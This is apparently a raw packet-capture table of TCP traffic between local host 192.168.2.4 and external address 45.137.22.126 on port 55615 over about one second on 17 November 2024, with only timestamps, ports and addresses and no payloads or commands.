Nov 17, 2024 03:07:13.993294954 CET	49738	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:14.040852070 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.040936947 CET	49738	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:14.088942051 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.089004040 CET	49738	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:14.140853882 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.140950918 CET	49738	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:14.172996044 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.173157930 CET	49738	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:14.178281069 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.178308964 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.178345919 CET	49738	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:14.178364992 CET	49738	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:14.178421974 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.178448915 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.178498983 CET	49738	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:14.178543091 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.178570032 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.178594112 CET	49738	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:14.178621054 CET	49738	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:14.178647995 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.178694963 CET	49738	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:14.178697109 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.178792000 CET	49738	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:14.178956985 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.179004908 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.179007053 CET	49738	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:14.179065943 CET	49738	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:14.179164886 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.179193020 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.179239988 CET	49738	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:14.179292917 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.179341078 CET	49738	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:14.179387093 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.179439068 CET	49738	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:14.179462910 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.179514885 CET	49738	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:14.179517984 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.179575920 CET	49738	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:14.179646969 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.179692030 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.179707050 CET	49738	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:14.179752111 CET	49738	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:14.179775000 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.179826021 CET	49738	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:14.179883003 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.179938078 CET	49738	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:14.179979086 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.180011034 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.180068016 CET	49738	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:14.180104971 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.180166960 CET	49738	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:14.180303097 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.180331945 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.180362940 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.180381060 CET	49738	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:14.180404902 CET	49738	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:14.183491945 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.183543921 CET	49738	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:14.183631897 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.183682919 CET	49738	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:14.183736086 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.183805943 CET	49738	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:14.183844090 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.183887959 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.183895111 CET	49738	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:14.183954000 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.184004068 CET	49738	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:14.184071064 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.184119940 CET	49738	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:14.184217930 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.184271097 CET	49738	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:14.184314013 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.184357882 CET	49738	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:14.184401035 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.184453011 CET	49738	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:14.184478045 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.184525967 CET	49738	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:14.184534073 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.184577942 CET	49738	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:14.184637070 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.184670925 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.184715033 CET	49738	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:14.184747934 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.184823036 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.184879065 CET	49738	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:14.184962988 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.185010910 CET	49738	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:14.185064077 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.185091972 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.185116053 CET	49738	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:14.185122967 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.185144901 CET	49738	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:14.185179949 CET	49738	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:14.185236931 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.185264111 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.185285091 CET	49738	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:14.185290098 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.185313940 CET	49738	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:14.185337067 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.185338974 CET	49738	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:14.185364008 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.185384035 CET	49738	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:14.185412884 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.185417891 CET	49738	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:14.185440063 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.185463905 CET	49738	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:14.185486078 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.185487986 CET	49738	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:14.185513020 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.185545921 CET	49738	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:14.185560942 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.185564041 CET	49738	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:14.185589075 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.185615063 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.185633898 CET	49738	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:14.185645103 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.185664892 CET	49738	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:14.185692072 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.185694933 CET	49738	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:14.185739994 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.185767889 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.185775995 CET	49738	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:14.185797930 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.185801029 CET	49738	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:14.185818911 CET	49738	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:14.185859919 CET	49738	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:14.185862064 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.185889006 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.185920000 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.185939074 CET	49738	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:14.185966969 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.185970068 CET	49738	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:14.185993910 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.186012983 CET	49738	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:14.186041117 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.186045885 CET	49738	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:14.186068058 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.186088085 CET	49738	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:14.186115980 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.186125040 CET	49738	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:14.186142921 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.186165094 CET	49738	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:14.186189890 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.186193943 CET	49738	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:14.186216116 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.186242104 CET	49738	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:14.186256886 CET	49738	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:14.186263084 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.186289072 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.186311960 CET	49738	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:14.186315060 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.186336994 CET	49738	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:14.186346054 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.186362982 CET	49738	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:14.186395884 CET	49738	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:14.186409950 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.186435938 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.186466932 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.186491966 CET	49738	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:14.186492920 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.186517954 CET	49738	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:14.186542034 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.186547041 CET	49738	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:14.186570883 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.186589956 CET	49738	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:14.186619043 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.186625004 CET	49738	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:14.186645985 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.186661005 CET	49738	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:14.186693907 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.186702967 CET	49738	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:14.186721087 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.186763048 CET	49738	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:14.186765909 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.186793089 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.186815023 CET	49738	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:14.186842918 CET	49738	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:14.188494921 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.188519001 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.188559055 CET	49738	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:14.188595057 CET	49738	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:14.188770056 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.188781977 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.188822031 CET	49738	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:14.188852072 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.188863993 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.188909054 CET	49738	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:14.188970089 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.188982010 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.189028025 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.189042091 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.189047098 CET	49738	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:14.189090967 CET	49738	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:14.189138889 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.189156055 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.189188957 CET	49738	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:14.189230919 CET	49738	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:14.189232111 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.189279079 CET	49738	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:14.189282894 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.189356089 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.189373016 CET	49738	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:14.189382076 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.189412117 CET	49738	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:14.189444065 CET	49738	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:14.189452887 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.189466000 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.189495087 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.189502001 CET	49738	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:14.189536095 CET	49738	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:14.189546108 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.189593077 CET	49738	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:14.189614058 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.189625025 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.189683914 CET	49738	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:14.189712048 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.189724922 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.189739943 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.189762115 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.189781904 CET	49738	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:14.189805984 CET	49738	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:14.189831018 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.189846039 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.189867973 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.189898968 CET	49738	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:14.189909935 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.189924955 CET	49738	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:14.189964056 CET	49738	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:14.190038919 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.190051079 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.190073967 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.190085888 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.190124989 CET	49738	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:14.190129995 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.190176964 CET	49738	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:14.190685987 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.190737009 CET	49738	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:14.191170931 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.191358089 CET	49738	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:14.191663027 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.191685915 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.191719055 CET	49738	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:14.191730976 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.191742897 CET	49738	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:14.191767931 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.191788912 CET	49738	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:14.191807032 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.191817999 CET	49738	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:14.191896915 CET	49738	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:14.191900015 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.191943884 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.191947937 CET	49738	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:14.191960096 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.191987991 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.191992044 CET	49738	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:14.192053080 CET	49738	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:14.192059040 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.192074060 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.192127943 CET	49738	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:14.192179918 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.192194939 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.192240000 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.192251921 CET	49738	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:14.192291021 CET	49738	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:14.192292929 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.192343950 CET	49738	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:14.192382097 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.192403078 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.192435980 CET	49738	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:14.192470074 CET	49738	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:14.192517996 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.192569971 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.192580938 CET	49738	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:14.192617893 CET	49738	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:14.192661047 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.192675114 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.192712069 CET	49738	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:14.192750931 CET	49738	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:14.192785978 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.192810059 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.192842960 CET	49738	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:14.192878008 CET	49738	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:14.192897081 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.192997932 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.193010092 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.193057060 CET	49738	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:14.193068981 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.193090916 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.193104029 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.193114996 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.193120003 CET	49738	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:14.193171978 CET	49738	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:14.193201065 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.193212986 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.193253040 CET	49738	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:14.193257093 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.193276882 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.193289995 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.193324089 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.193340063 CET	49738	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:14.193368912 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.193383932 CET	49738	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:14.193398952 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.193423033 CET	49738	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:14.193449974 CET	49738	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:14.193471909 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.193483114 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.193535089 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.193537951 CET	49738	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:14.193584919 CET	49738	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:14.193614006 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.193625927 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.193641901 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.193662882 CET	49738	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:14.193702936 CET	49738	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:14.193746090 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.193757057 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.193789959 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.193800926 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.193802118 CET	49738	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:14.193837881 CET	49738	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:14.193860054 CET	49738	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:14.193865061 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.193876982 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.193945885 CET	49738	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:14.193949938 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.193962097 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.193975925 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.193999052 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.194005013 CET	49738	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:14.194031000 CET	49738	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:14.194053888 CET	49738	55615	192.168.2.4	45.137.22.126
